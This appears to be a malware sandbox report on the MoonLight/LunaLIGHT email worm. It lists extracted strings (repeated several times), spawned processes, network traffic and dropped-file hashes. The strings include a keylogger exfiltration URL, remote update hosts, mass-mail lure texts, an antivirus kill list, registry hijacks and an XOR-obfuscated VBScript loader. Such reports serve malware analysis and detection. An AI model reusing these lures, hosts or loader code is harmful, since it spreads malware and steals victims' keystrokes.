OpenAsTextStream
ReadAll
ReadLine
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-._
RealPlayer13-5GOLD.exe
Icon Cool-Editor 3.4.30315.exe
CheatEngine52.exe
framework-4.4.exe
Vista Transformation Pack 4.0.exe
Pack_Vista_Inspirat_1.6.exe
DeepUnfreezerU1.6.exe
Pack_Longhorn_Inspirat_1.6_code32547.exe
TeamViewer_Setup.exe
Licence.exe
Pictures.exe
Secret.exe
Documents.exe
Vivid.exe
update.exe
XXX.exe
cool.exe
vitae.exe
error.exe
@ght Upda
explore
regedit
\cypreg.dll
service.exe
smss.exe
system
Uzpz}lh{'mee
\startup
Efjhe)Zl}}`gnzUHyye`jh}`fg)Mh}h
Zfo}~h{lUD`j{fzfo}Uylh{eUk`hgn
Zfo}~h{lUD`j{fzfo}UYlh{eUYh}a
.{645FF040-5081-101B-9F08-00AA002F954E}
`jl'lql
Uzdzz'lql
lsass.exe
system.exe
\regedit.exe
\winlogon.exe
\system.exe
\lsass.exe
U{lnlm`}'jdm
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fg
ULqyef{l{UJhk`gl}Z}h}l
FullPath
ZFO]^H[LUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gefnfg
explorer.exe,
Zfo}~h{lUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gmf~z
\Explorer\Advanced
HideFileExt
Hidden
ShowSuperHidden
scrfile
File Folder
exefile
SOFTWARE\Classes\exefile
ZPZ]LDUJ|{{lg}Jfg}{feZl}UZl{
`jlzUZah{lmHjjlzz
ULqyef{l{UHm
hgjlmUOfeml{UZ|yl{A`mmlg
\gjaljblm_he|l
msconfig.exe
debugger
ZFO]^H[LUYfe`j`lzUD`j{fzfo}U^`gmf~z)G]UZpz}ld[lz}f{l
DisableConfig
DisableSR
ZPZ]LDUJfg}{feZl}998UJfg}{feUZholKff}
He}l{gh}lZalee
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
\notepad.exe
regedit.exe
rstrui.exe
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fgU{|g
drv_st_key
gf{dhgVshgmh
gf{dhg)shgmh
^`ghdy
^`g\ymh}lZ|yl{
J|lQ==Vz}`eVal{l
H|}fZ|yl{
SMA_nya_Artika
Putri_Indonesia
BabelPath
Alumni Smansa
ViriSetup
SMAN1_Pangkalpinang
Putri_Bangka
SysYuni
SysDiaz
SysRia
DllHost
SaTRio ADie X
Tok-Cirrhatus
AllMyBallance
MomentEverComes
TryingToSpeak
YourUnintended
YourUnintendes
lexplorer
dkernel
Bron-Spizaetus
ADie suka kamu
winfix
templog
service
Grogotix
\windows*
\ShellNew\*.exe
\*.exe
\*.vbs
\MyHeart.exe
\KesenjanganSosial.exe
\FirstLove.exe*
\eksplorasi*
\CintaButa*
\*.pif
\Romantic*
Zj{`y}`gn'O`elZpz}ldFkclj}
\msvbvm60.dll
Uzpz}ldUdz
d?9'mee
UDZ^@GZJB'fjq
ThunderRT6FormDC
TForm1
\MooNlight.R.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|Dev!l.Inc|
I-WorM.LunaLIGHT.d Aliase W32/MoonLight.R@mm
CopyRight @ HellSpawn a.K.a B4bb1CooL
Once In The Blue Moon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.bsi.ac.id
http://www.google.com/
http://
memencool.netfast.org
/testms.php?mod=save&bkd=0&klog=
\moonlight.dll
\onceinabluemoon.mid
desktop.ini
Elitta.htt
moonlight.exe
</head>
############
Windows Sockets Version
is not supported by Windows
Sockets For 32 bit Windows environments.
This application requires a minimum of
supported sockets.
MAIL FROM: <
RCPT TO: <
----_=_NextPart_000_
00000000
From: <
Subject:
Date:
yyyy hh:nn:ss
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=
Content-Type:
text/plain;
charset=
windows-1255
Content-Transfer-Encoding: 7bit
Content-Type: application/octet-stream;
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=
{backspace}
{shift}
{ctrl}
{pause}
{home}
{left}
{right}
{down}
{insert}
{Delete}
Visible
{NumLock}
{ScrollLock}
{PrintScreen}
{PageUp}
{Pagedown}
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{U
Default Mail Account
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{UHjjf|g}zU
SMTP Server
SMTP Email Address
hackersmail.com
hotmail.com
gmail.com
msn.com
yahoo.com.sg
Lovemail.com
mail1.
relay.
D`phk`
ghm`gl
}a`zo`el
gllm)pf|
Tolong Aku..
Tolong
Nadine
Aku Mencari Wanita yang aku Cintai
dan cara menggunakan email mass
ini adalah cara terakhirku ,di lampiran ini terdapat
foto dan data Wanita tsb Thank's
NB:Mohon di teruskan kesahabat anda
aku mahasiswa BSI Margonda smt 4
yah aku sedang membutuhkan pekerjaan
oh ya aku tahu anda dr milis ilmu komputer
di lampiran ini terdapat curriculum vittae dan foto saya
hey Indonesian porn
Agnes Monica pic's
Fucking With Me :D
sisilia
please read again what i have written to you
Hot ...
miss Indonesian
Cek This
Japannes Porn
Firmansyah
Lanelitta
Fransisca
Claudia
Fransiska
Cicilia
CoolMan
Valentina
sasuke
HellSpawn
JuwitaNingrum
Natalia
telkom
astaga
warung
Enter the comment
alias mysound
Administrator
\ADMIN$
memencool.netfast.org/update.txt
siap.host.sk/update.txt
yosef.netfast.org/update.txt
friendster.netfast.org/Update.txt
\untk.com
play mySound
<!-- Code By HellSPawN a.k.a B4BB!cool -->
<script language=vbscript>
5a}de75alhm75&alhm75kfmp)z}pel4+dh{n`g3)9+)zj{fee4gf75fkclj})`m4O`el
E`z})kf{ml{49)}hk`gmlq48)jehzz`m4+jez`m381;9OLM9$=>:L$88M9$H0?J$99J9=OM
>9<H;+)z}pel4+~`m}a3)899,2)al`na}3)899,+)}hk@gmlq4$875&fkclj}75&kfmp75F
KCLJ])@M4+[\G@]+)^@M]A49)AL@NA]49))]PYL4+hyye`jh}`fg&q$felfkclj}+)JFMLK
HZL4+dffge`na}'lql*
l{z`fg48%8%8%8+75YH[HD)GHDL4+V_l{z`fg+)_HE\L4+?<<:?
+75&FKCLJ]7
dePok = 12321
For i = 1 To Len(a)
Hacker = Asc(Mid(a, i, 1))
crbyte = Chr(Hacker Xor (dePok Mod 12))
xx = xx & crbyte
document.Write xx
</script>
[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://moon\Elitta.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
dEvil.Inc
FileDescription
LunALight Zipper
FileVersion
InternalName
LegalCopyright
OriginalFilename
ProductName
ProductVersion
VarFileInfo
Translation
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
Comments
Microsoft Corporation
CompanyName
File Folder
ProductName
FileVersion
ProductVersion
InternalName
FILE FOLDER
OriginalFilename
FILE FOLDER.exe
EIDGZP
@@@@@@
@@@@@@@@
@@@@@@
@@@@@@@
@@@@@@
AAAAAAA
BBBBBBB
BBBBBBB
BBBBBBBBB
BBBBBBB
BBBBBBB
BBBBBB
BBBBBBBB
BBBBBBBB
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
@OLDER.exe
@OLDER.exe
C*\AD:\DataHellSpawn\WARING_VIRII_LABORATORY\Virus Ku\Moonlight Update Baru\Project1.vbp
winlogon.exe
sophos
mcafee
norton
security
d`j{fzfo}
z|yf{}
DffgDh`e
pf|{z`}l
pf|{mfdh`g
norman
vaksin
novell
Gf{dhg)GCll
Gf{dhg)Shgmh
GetFile
\MYpIC.zip
GET / HTTP/1.1
Host:
Friendster
hotmail
\64enc.en
OpenAsTextStream
ReadAll
ReadLine
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-._
RealPlayer13-5GOLD.exe
Icon Cool-Editor 3.4.30315.exe
CheatEngine52.exe
framework-4.4.exe
Vista Transformation Pack 4.0.exe
Pack_Vista_Inspirat_1.6.exe
DeepUnfreezerU1.6.exe
Pack_Longhorn_Inspirat_1.6_code32547.exe
TeamViewer_Setup.exe
Licence.exe
Pictures.exe
Secret.exe
Documents.exe
Vivid.exe
update.exe
XXX.exe
cool.exe
vitae.exe
error.exe
@ght Upda
explore
regedit
\cypreg.dll
service.exe
smss.exe
system
Uzpz}lh{'mee
\startup
Efjhe)Zl}}`gnzUHyye`jh}`fg)Mh}h
Zfo}~h{lUD`j{fzfo}Uylh{eUk`hgn
Zfo}~h{lUD`j{fzfo}UYlh{eUYh}a
.{645FF040-5081-101B-9F08-00AA002F954E}
`jl'lql
Uzdzz'lql
lsass.exe
system.exe
\regedit.exe
\winlogon.exe
\system.exe
\lsass.exe
U{lnlm`}'jdm
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fg
ULqyef{l{UJhk`gl}Z}h}l
FullPath
ZFO]^H[LUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gefnfg
explorer.exe,
Zfo}~h{lUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gmf~z
\Explorer\Advanced
HideFileExt
Hidden
ShowSuperHidden
scrfile
File Folder
exefile
SOFTWARE\Classes\exefile
ZPZ]LDUJ|{{lg}Jfg}{feZl}UZl{
`jlzUZah{lmHjjlzz
ULqyef{l{UHm
hgjlmUOfeml{UZ|yl{A`mmlg
\gjaljblm_he|l
msconfig.exe
debugger
ZFO]^H[LUYfe`j`lzUD`j{fzfo}U^`gmf~z)G]UZpz}ld[lz}f{l
DisableConfig
DisableSR
ZPZ]LDUJfg}{feZl}998UJfg}{feUZholKff}
He}l{gh}lZalee
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
\notepad.exe
regedit.exe
rstrui.exe
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fgU{|g
drv_st_key
gf{dhgVshgmh
gf{dhg)shgmh
^`ghdy
^`g\ymh}lZ|yl{
J|lQ==Vz}`eVal{l
H|}fZ|yl{
SMA_nya_Artika
Putri_Indonesia
BabelPath
Alumni Smansa
ViriSetup
SMAN1_Pangkalpinang
Putri_Bangka
SysYuni
SysDiaz
SysRia
DllHost
SaTRio ADie X
Tok-Cirrhatus
AllMyBallance
MomentEverComes
TryingToSpeak
YourUnintended
YourUnintendes
lexplorer
dkernel
Bron-Spizaetus
ADie suka kamu
winfix
templog
service
Grogotix
\windows*
\ShellNew\*.exe
\*.exe
\*.vbs
\MyHeart.exe
\KesenjanganSosial.exe
\FirstLove.exe*
\eksplorasi*
\CintaButa*
\*.pif
\Romantic*
Zj{`y}`gn'O`elZpz}ldFkclj}
\msvbvm60.dll
Uzpz}ldUdz
d?9'mee
UDZ^@GZJB'fjq
ThunderRT6FormDC
TForm1
\MooNlight.R.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|Dev!l.Inc|
I-WorM.LunaLIGHT.d Aliase W32/MoonLight.R@mm
CopyRight @ HellSpawn a.K.a B4bb1CooL
Once In The Blue Moon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.bsi.ac.id
http://www.google.com/
http://
memencool.netfast.org
/testms.php?mod=save&bkd=0&klog=
\moonlight.dll
\onceinabluemoon.mid
desktop.ini
Elitta.htt
moonlight.exe
</head>
############
Windows Sockets Version
is not supported by Windows
Sockets For 32 bit Windows environments.
This application requires a minimum of
supported sockets.
MAIL FROM: <
RCPT TO: <
----_=_NextPart_000_
00000000
From: <
Subject:
Date:
yyyy hh:nn:ss
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=
Content-Type:
text/plain;
charset=
windows-1255
Content-Transfer-Encoding: 7bit
Content-Type: application/octet-stream;
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=
{backspace}
{shift}
{ctrl}
{pause}
{home}
{left}
{right}
{down}
{insert}
{Delete}
Visible
{NumLock}
{ScrollLock}
{PrintScreen}
{PageUp}
{Pagedown}
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{U
Default Mail Account
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{UHjjf|g}zU
SMTP Server
SMTP Email Address
hackersmail.com
hotmail.com
gmail.com
msn.com
yahoo.com.sg
Lovemail.com
mail1.
relay.
D`phk`
ghm`gl
}a`zo`el
gllm)pf|
Tolong Aku..
Tolong
Nadine
Aku Mencari Wanita yang aku Cintai
dan cara menggunakan email mass
ini adalah cara terakhirku ,di lampiran ini terdapat
foto dan data Wanita tsb Thank's
NB:Mohon di teruskan kesahabat anda
aku mahasiswa BSI Margonda smt 4
yah aku sedang membutuhkan pekerjaan
oh ya aku tahu anda dr milis ilmu komputer
di lampiran ini terdapat curriculum vittae dan foto saya
hey Indonesian porn
Agnes Monica pic's
Fucking With Me :D
sisilia
please read again what i have written to you
Hot ...
miss Indonesian
Cek This
Japannes Porn
Firmansyah
Lanelitta
Fransisca
Claudia
Fransiska
Cicilia
CoolMan
Valentina
sasuke
HellSpawn
JuwitaNingrum
Natalia
telkom
astaga
warung
Enter the comment
alias mysound
Administrator
\ADMIN$
memencool.netfast.org/update.txt
siap.host.sk/update.txt
yosef.netfast.org/update.txt
friendster.netfast.org/Update.txt
\untk.com
play mySound
<!-- Code By HellSPawN a.k.a B4BB!cool -->
<script language=vbscript>
5a}de75alhm75&alhm75kfmp)z}pel4+dh{n`g3)9+)zj{fee4gf75fkclj})`m4O`el
E`z})kf{ml{49)}hk`gmlq48)jehzz`m4+jez`m381;9OLM9$=>:L$88M9$H0?J$99J9=OM
>9<H;+)z}pel4+~`m}a3)899,2)al`na}3)899,+)}hk@gmlq4$875&fkclj}75&kfmp75F
KCLJ])@M4+[\G@]+)^@M]A49)AL@NA]49))]PYL4+hyye`jh}`fg&q$felfkclj}+)JFMLK
HZL4+dffge`na}'lql*
l{z`fg48%8%8%8+75YH[HD)GHDL4+V_l{z`fg+)_HE\L4+?<<:?
+75&FKCLJ]7
dePok = 12321
For i = 1 To Len(a)
Hacker = Asc(Mid(a, i, 1))
crbyte = Chr(Hacker Xor (dePok Mod 12))
xx = xx & crbyte
document.Write xx
</script>
[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://moon\Elitta.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
dEvil.Inc
FileDescription
LunALight Zipper
FileVersion
InternalName
LegalCopyright
OriginalFilename
ProductName
ProductVersion
VarFileInfo
Translation
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
Comments
Microsoft Corporation
CompanyName
File Folder
ProductName
FileVersion
ProductVersion
InternalName
FILE FOLDER
OriginalFilename
FILE FOLDER.exe
EIDGZS
@@@@@@
@@@@@@@@
@@@@@@
@@@@@@@
@@@@@@
AAAAAAA
BBBBBBB
BBBBBBB
BBBBBBBBB
BBBBBBB
BBBBBBB
BBBBBB
BBBBBBBB
BBBBBBBB
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
)11RZck{{
!))!91JRZs{
y!)!119B
yBJJZR
}Zkkcsks{
!)BRRcZcsk{
@OLDER.exe
@OLDER.exe
C*\AD:\DataHellSpawn\WARING_VIRII_LABORATORY\Virus Ku\Moonlight Update Baru\Project1.vbp
winlogon.exe
sophos
mcafee
norton
security
d`j{fzfo}
z|yf{}
DffgDh`e
pf|{z`}l
pf|{mfdh`g
norman
vaksin
novell
Gf{dhg)GCll
Gf{dhg)Shgmh
GetFile
\MYpIC.zip
GET / HTTP/1.1
Host:
Friendster
hotmail
\64enc.en
OpenAsTextStream
ReadAll
ReadLine
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-._
RealPlayer13-5GOLD.exe
Icon Cool-Editor 3.4.30315.exe
CheatEngine52.exe
framework-4.4.exe
Vista Transformation Pack 4.0.exe
Pack_Vista_Inspirat_1.6.exe
DeepUnfreezerU1.6.exe
Pack_Longhorn_Inspirat_1.6_code32547.exe
TeamViewer_Setup.exe
Licence.exe
Pictures.exe
Secret.exe
Documents.exe
Vivid.exe
update.exe
XXX.exe
cool.exe
vitae.exe
error.exe
@ght Upda
explore
regedit
\cypreg.dll
service.exe
smss.exe
system
Uzpz}lh{'mee
\startup
Efjhe)Zl}}`gnzUHyye`jh}`fg)Mh}h
Zfo}~h{lUD`j{fzfo}Uylh{eUk`hgn
Zfo}~h{lUD`j{fzfo}UYlh{eUYh}a
.{645FF040-5081-101B-9F08-00AA002F954E}
`jl'lql
Uzdzz'lql
lsass.exe
system.exe
\regedit.exe
\winlogon.exe
\system.exe
\lsass.exe
U{lnlm`}'jdm
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fg
ULqyef{l{UJhk`gl}Z}h}l
FullPath
ZFO]^H[LUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gefnfg
explorer.exe,
Zfo}~h{lUD`j{fzfo}U^`gmf~z)G]UJ|{{lg}_l{z`fgU^`gmf~z
\Explorer\Advanced
HideFileExt
Hidden
ShowSuperHidden
scrfile
File Folder
exefile
SOFTWARE\Classes\exefile
ZPZ]LDUJ|{{lg}Jfg}{feZl}UZl{
`jlzUZah{lmHjjlzz
ULqyef{l{UHm
hgjlmUOfeml{UZ|yl{A`mmlg
\gjaljblm_he|l
msconfig.exe
debugger
ZFO]^H[LUYfe`j`lzUD`j{fzfo}U^`gmf~z)G]UZpz}ld[lz}f{l
DisableConfig
DisableSR
ZPZ]LDUJfg}{feZl}998UJfg}{feUZholKff}
He}l{gh}lZalee
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
\notepad.exe
regedit.exe
rstrui.exe
Zfo}~h{lUD`j{fzfo}U^`gmf~zUJ|{{lg}_l{z`fgU{|g
drv_st_key
gf{dhgVshgmh
gf{dhg)shgmh
^`ghdy
^`g\ymh}lZ|yl{
J|lQ==Vz}`eVal{l
H|}fZ|yl{
SMA_nya_Artika
Putri_Indonesia
BabelPath
Alumni Smansa
ViriSetup
SMAN1_Pangkalpinang
Putri_Bangka
SysYuni
SysDiaz
SysRia
DllHost
SaTRio ADie X
Tok-Cirrhatus
AllMyBallance
MomentEverComes
TryingToSpeak
YourUnintended
YourUnintendes
lexplorer
dkernel
Bron-Spizaetus
ADie suka kamu
winfix
templog
service
Grogotix
\windows*
\ShellNew\*.exe
\*.exe
\*.vbs
\MyHeart.exe
\KesenjanganSosial.exe
\FirstLove.exe*
\eksplorasi*
\CintaButa*
\*.pif
\Romantic*
Zj{`y}`gn'O`elZpz}ldFkclj}
\msvbvm60.dll
Uzpz}ldUdz
d?9'mee
UDZ^@GZJB'fjq
ThunderRT6FormDC
TForm1
\MooNlight.R.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|Dev!l.Inc|
I-WorM.LunaLIGHT.d Aliase W32/MoonLight.R@mm
CopyRight @ HellSpawn a.K.a B4bb1CooL
Once In The Blue Moon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.bsi.ac.id
http://www.google.com/
http://
memencool.netfast.org
/testms.php?mod=save&bkd=0&klog=
\moonlight.dll
\onceinabluemoon.mid
desktop.ini
Elitta.htt
moonlight.exe
</head>
############
Windows Sockets Version
is not supported by Windows
Sockets For 32 bit Windows environments.
This application requires a minimum of
supported sockets.
MAIL FROM: <
RCPT TO: <
----_=_NextPart_000_
00000000
From: <
Subject:
Date:
yyyy hh:nn:ss
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=
Content-Type:
text/plain;
charset=
windows-1255
Content-Transfer-Encoding: 7bit
Content-Type: application/octet-stream;
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=
{backspace}
{shift}
{ctrl}
{pause}
{home}
{left}
{right}
{down}
{insert}
{Delete}
Visible
{NumLock}
{ScrollLock}
{PrintScreen}
{PageUp}
{Pagedown}
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{U
Default Mail Account
Zfo}~h{lUD`j{fzfo}U@g}l{gl})Hjjf|g})Dhghnl{UHjjf|g}zU
SMTP Server
SMTP Email Address
hackersmail.com
hotmail.com
gmail.com
msn.com
yahoo.com.sg
Lovemail.com
mail1.
relay.
D`phk`
ghm`gl
}a`zo`el
gllm)pf|
Tolong Aku..
Tolong
Nadine
Aku Mencari Wanita yang aku Cintai
dan cara menggunakan email mass
ini adalah cara terakhirku ,di lampiran ini terdapat
foto dan data Wanita tsb Thank's
NB:Mohon di teruskan kesahabat anda
aku mahasiswa BSI Margonda smt 4
yah aku sedang membutuhkan pekerjaan
oh ya aku tahu anda dr milis ilmu komputer
di lampiran ini terdapat curriculum vittae dan foto saya
hey Indonesian porn
Agnes Monica pic's
Fucking With Me :D
sisilia
please read again what i have written to you
Hot ...
miss Indonesian
Cek This
Japannes Porn
Firmansyah
Lanelitta
Fransisca
Claudia
Fransiska
Cicilia
CoolMan
Valentina
sasuke
HellSpawn
JuwitaNingrum
Natalia
telkom
astaga
warung
Enter the comment
alias mysound
Administrator
\ADMIN$
memencool.netfast.org/update.txt
siap.host.sk/update.txt
yosef.netfast.org/update.txt
friendster.netfast.org/Update.txt
\untk.com
play mySound
<!-- Code By HellSPawN a.k.a B4BB!cool -->
<script language=vbscript>
5a}de75alhm75&alhm75kfmp)z}pel4+dh{n`g3)9+)zj{fee4gf75fkclj})`m4O`el
E`z})kf{ml{49)}hk`gmlq48)jehzz`m4+jez`m381;9OLM9$=>:L$88M9$H0?J$99J9=OM
>9<H;+)z}pel4+~`m}a3)899,2)al`na}3)899,+)}hk@gmlq4$875&fkclj}75&kfmp75F
KCLJ])@M4+[\G@]+)^@M]A49)AL@NA]49))]PYL4+hyye`jh}`fg&q$felfkclj}+)JFMLK
HZL4+dffge`na}'lql*
l{z`fg48%8%8%8+75YH[HD)GHDL4+V_l{z`fg+)_HE\L4+?<<:?
+75&FKCLJ]7
dePok = 12321
For i = 1 To Len(a)
Hacker = Asc(Mid(a, i, 1))
crbyte = Chr(Hacker Xor (dePok Mod 12))
xx = xx & crbyte
document.Write xx
</script>
[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://moon\Elitta.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

Process Tree


0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe, PID: 2400, Parent PID: 2948

default registry file network process services synchronisation iexplore office pdf

service.exe, PID: 2708, Parent PID: 2400

default registry file network process services synchronisation iexplore office pdf

smss.exe, PID: 2404, Parent PID: 2400

default registry file network process services synchronisation iexplore office pdf

system.exe, PID: 2492, Parent PID: 2400

default registry file network process services synchronisation iexplore office pdf

winlogon.exe, PID: 1836, Parent PID: 2400

default registry file network process services synchronisation iexplore office pdf

lsass.exe, PID: 1176, Parent PID: 2400

default registry file network process services synchronisation iexplore office pdf

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 61714 8.8.8.8 53
192.168.56.101 56933 8.8.8.8 53
192.168.56.101 138 192.168.56.255 138
192.168.56.101 58485 114.114.114.114 53
192.168.56.101 58485 8.8.8.8 53
192.168.56.101 57665 114.114.114.114 53
192.168.56.101 51758 114.114.114.114 53

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Name 32d86ff020c151f0_regedit.cmd
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\regedit.cmd
Size 1.6MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 1836 (winlogon.exe) 2404 (smss.exe) 2492 (system.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 e3b8649bd6ae9bbb0229b0485d7b8dc3
SHA1 d2265befe53d73699803e0eb23a08c5340d11af5
SHA256 32d86ff020c151f084d27193577eadf9fadc6167723793ba9a61faeabe656c13
CRC32 27F945D7
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name add9dc562e49fec3_cypreg.dll
Filepath C:\Windows\cypreg.dll
Size 417.0KB
Processes 2404 (smss.exe) 1176 (lsass.exe)
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 8bfe4d858a6597fbace8649427ab5b6f
SHA1 4f25915fe315a6f2795aec001dad837bbf3d7728
SHA256 add9dc562e49fec32fa34819b5d8add52e3ea5172825323af0cefd940fd28300
CRC32 AD2B6EAC
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name fde1d6071f00d2fc_regedit.cmd
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\regedit.cmd
Size 1.6MB
Processes 1176 (lsass.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 8d22052161f601fc433be4db67ba925f
SHA1 d44db9966174098bcd6a7f52f2421348a241b237
SHA256 fde1d6071f00d2fcb18949f3d162d2b65fa73486d99feae825d4983ec73a5079
CRC32 486AE0C6
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name ca0c134ed8122602_winlogon.exe
Filepath C:\Windows\KQW3X6L.{645FF040-5081-101B-9F08-00AA002F954E}\winlogon.exe
Size 1.6MB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 2492 (system.exe)
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 e9a0e448d959b6694f596ac2940a2b75
SHA1 74a408f794484d512f71c9c1d990d0ec2aeda85c
SHA256 ca0c134ed8122602cc581f89a22a7af1531d5f1951e6b12172ff6cbf4c39f963
CRC32 5D2985C4
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 4cbbe69bcd0a2deb_moonlight.dll
Filepath C:\Windows\moonlight.dll
Size 65.0KB
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 2708 (service.exe) 2404 (smss.exe) 2492 (system.exe) 1836 (winlogon.exe) 1176 (lsass.exe)
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
MD5 c55534452c57efa04f4109310f71ccca
SHA1 b97a3d9e2c1ad9314562b7d0d77b2a4b34e77d61
SHA256 4cbbe69bcd0a2debae6a584e1fa49f8d4a27f90d9cd364255bbbd930ca0a38bc
CRC32 55244F61
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 481c0df97ddcb1f1_systear.dll
Filepath C:\Windows\SysWOW64\systear.dll
Size 141.0B
Processes 2400 (0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe) 1836 (winlogon.exe) 2708 (service.exe) 2492 (system.exe) 2404 (smss.exe) 1176 (lsass.exe)
Type ASCII text, with CRLF line terminators
MD5 b4b1c988f8f5a55f22d3347f78d4952b
SHA1 f8a77c61723f3efebabb0b7af087dc1e97e04a57
SHA256 481c0df97ddcb1f1de38c9470eb737d5018d997b3d5fb1821427d8c9ccfb762d
CRC32 AC127FED
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 84963f728e6f632c_msvbvm60.dll
Filepath C:\Windows\system\msvbvm60.dll
Size 1.3MB
Processes 2404 (smss.exe) 1176 (lsass.exe)
Type PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 e97358bdf7a9d264db01f811ec161aba
SHA1 8ad06fa64ec2f74670514a8f927e821efb503ccc
